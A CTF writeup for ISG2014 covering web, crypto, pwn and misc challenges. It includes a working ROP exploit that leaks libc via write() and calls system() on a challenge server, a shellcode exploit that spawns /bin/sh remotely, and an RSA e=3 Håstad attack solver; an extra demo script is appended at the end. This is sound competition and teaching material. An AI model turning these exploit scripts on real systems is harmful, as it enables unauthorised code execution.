ISG2014 Writeups
All files bundled for download: ISG.zip
Smile (Web 200)

PHP source code audit. [image: 2014101109351673887.png]

Cryptobaby (Crypto 100)

Following the program logic, split the data at 0x403018 into characters in base 131 and the flag falls out.

Pwnme (Exploit 300)

The bug is an obvious stack overflow, but no libc is provided, so the addresses of libc functions have to be found by ourselves. Here we use pwntools to resolve the address of system, write its argument into the data segment and finally call it. Calling system ran into a strange offset problem, so the position of the final system gadget on the stack was adjusted slightly.

```python
#!/usr/bin/env python2
from zio import *
from pwn import *

@MemLeak
def leak_write(addr):
    # ROP chain: write(1, addr, <whatever is left in rdx>), then return to main
    # so the overflow can be triggered again for the next leak.
    io.read_until('Pwn me if you can:\n')
    payload = 'A' * 24 + l64(poprdi) + l64(1) + l64(poprsi) + l64(addr) + junk + l64(write_plt) + l64(main)
    io.write(payload.ljust(0x100, 'A'))
    ret = io.read(256)
    return ret

target = './pwnme'                   # local binary
target = ('202.120.7.69', 34343)     # remote service (overrides the local target)
poprdi = 0x400663
poprsi = 0x400661    # pop rsi; pop r15; ret
ret = 0x400664
write_got = 0x601018
write_plt = 0x400480
main = 0x4005bd
junk = 'J' * 8       # filler for the r15 pop
data = 0x601040      # writable .data, used to hold the system() argument
read_plt = 0x4004a0

io = zio(target, print_read=False, print_write=False, timeout=100000)

# Resolve system() in the unknown libc by leaking memory through write()
elf = DynELF('./pwnme', leak_write)
system = elf.lookup('system')
log.success('system: %s' % hex(system))

# read(0, data, ...) to place the command string, then system(data).
# The run of ret gadgets is the stack adjustment mentioned in the text.
io.read_until('Pwn me if you can:\n')
payload = 'A' * 24 + l64(poprdi) + l64(0) + l64(poprsi) + l64(data) + junk + l64(read_plt) + l64(poprdi) + l64(data) + l64(ret) * 5 + l64(system)
io.write(payload.ljust(0x100, 'A'))
io.write('cat /home/pwnme/flag'.ljust(0x100, 'A'))
io.interact()
```

SQLMAP (Misc 100)

The challenge provides a capture of sqlmap's traffic; infer each byte from the SQL statements and their results.

```python
#!/usr/bin/env python2
import sys, re

def remove(idx, sign, value):
    sub = xrange(0, value)
```

[The rest of this script, starting at its `if sign == '...` line, and the title and description of the next challenge are cut off on the page; only the next challenge's exploit script survives.]

```python
#!/usr/bin/env python2
from zio import *

# Shellcode used below, with its disassembly (rbx is expected to already hold
# '/bin//sh', pushed together with rbp so that rdi points at the string):
#  a: 99           cltd
#  b: 89 de        mov %ebx,%esi
#  d: 53           push %rbx
#  e: 55           push %rbp
#  f: 48 89 e7     mov %rsp,%rdi
# 12: 6a 3b        pushq $0x3b
# 14: 58           pop %rax
# 15: 0f 05        syscall
call_rax = 0x40070d
shellcode = '9989de53554889e76a3b580f05'.decode('hex') + '\x90' + '/bin//sh'

host = '202.120.7.73'
port = 44445
io = zio((host, port))
# shellcode, a nop pad, the '/bin//sh' string, then the 6 significant bytes of
# the call rax gadget address
payload = shellcode + l64(call_rax)[:6]
io.write(payload)
io.interact()
```

GIF (Misc 50)

The second frame of the GIF is a QR code; its content is the flag.

丫丫 (Crypto 400)

The capture contains 7 sets of public keys and ciphertexts. Since e=3, Håstad's broadcast attack applies and the plaintext can be recovered with the Chinese Remainder Theorem. The 7 plaintexts turned out not to be all identical, so we enumerated choices of 3 of them to decrypt and finally obtained the flag.

```python
#!/usr/bin/env python2
from operator import mod, mul, sub, add
from functools import reduce
import re, os, collections, sys
import fractions
import itertools

def eea(a, b):
    """Extended Euclidean Algorithm for GCD"""
    v1 = [a, 1, 0]
    v2 = [b, 0, 1]
    while v2[0] != 0:
        p = v1[0] // v2[0]  # floor division
        v2, v1 = list(map(sub, v1, [p * vi for vi in v2])), v2
    return v1

def inverse(m, k):
    """Return b such that b*m mod k = 1, or 0 if no solution"""
    v = eea(m, k)
    return (v[0] == 1) * (v[1] % k)

def crt(ms, _as):
    """Chinese Remainder Theorem:
    ms = list of pairwise relatively prime integers
    as = remainders when x is divided by ms
    (ai is 'each in as', mi 'each in ms')
    The solution for x modulo M (M = product of ms) will be:
    x = a1*M1*y1 + a2*M2*y2 + ... + ar*Mr*yr (mod M),
    where Mi = M/mi and yi = (Mi)^-1 (mod mi) for 1 <= i <= r
    """
    # Body exactly as the docstring describes
    M = reduce(mul, ms)
    x = 0
    for mi, ai in zip(ms, _as):
        Mi = M // mi
        x += ai * Mi * inverse(Mi, mi)
    return x % M
```

[The remainder of the script, which applies crt to the captured key/ciphertext sets, is cut off on the page.]
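The attack described above, carried through as an added example (Python 3, not the writeup's own script): every 3-subset of the captured (N, c) pairs is combined with the CRT, and the subset whose result is a perfect cube yields the shared plaintext, which is how the "not all plaintexts identical" situation is handled. The moduli, messages and ciphertexts are constructed toy values built from small known primes, not the challenge's keys.

```python
from itertools import combinations
from math import gcd, prod

def crt(residues, moduli):
    """Combine c_i mod N_i into the unique x mod prod(N_i); moduli pairwise coprime."""
    M = prod(moduli)
    x = sum(c * (M // n) * pow(M // n, -1, n) for c, n in zip(residues, moduli))
    return x % M

def icbrt(n):
    """Smallest r with r**3 >= n, by binary search on exact integers."""
    lo, hi = 0, 1 << ((n.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < n:
            lo = mid + 1
        else:
            hi = mid
    return lo

def hastad_e3(pairs):
    """pairs: list of (N, c) with c = m**3 mod N. Return (indices, m) for the first 3-subset whose CRT value is a cube."""
    for idx in combinations(range(len(pairs)), 3):
        mods = [pairs[i][0] for i in idx]
        if any(gcd(a, b) != 1 for a, b in combinations(mods, 2)):
            continue  # CRT needs pairwise coprime moduli
        x = crt([pairs[i][1] for i in idx], mods)
        r = icbrt(x)
        if r ** 3 == x:   # only holds when all three captures encrypt the same m
            return idx, r
    return None

# Constructed sample (not the challenge's keys): toy moduli from known primes.
PRIMES = [65537, 2305843009213693951, 1000003, 4294967311, 999999937,
          4294967291, 1000000007, 2147483647, 1000000009, 998244353]
MODULI = [PRIMES[i] * PRIMES[i + 1] for i in range(0, len(PRIMES), 2)]
FLAG = int.from_bytes(b"ISG{x}", "big")
OTHER = int.from_bytes(b"nope!!", "big")
PLAINTEXTS = [FLAG, OTHER, FLAG, OTHER, FLAG]   # not every capture carries the flag
CAPTURED = [(N, pow(m, 3, N)) for N, m in zip(MODULI, PLAINTEXTS)]

def recover_flag(captured=CAPTURED):
    hit = hastad_e3(captured)
    if hit is None:
        return None
    return hit[0], hit[1].to_bytes((hit[1].bit_length() + 7) // 8, "big")

print(recover_flag())   # ((0, 2, 4), b'ISG{x}')
```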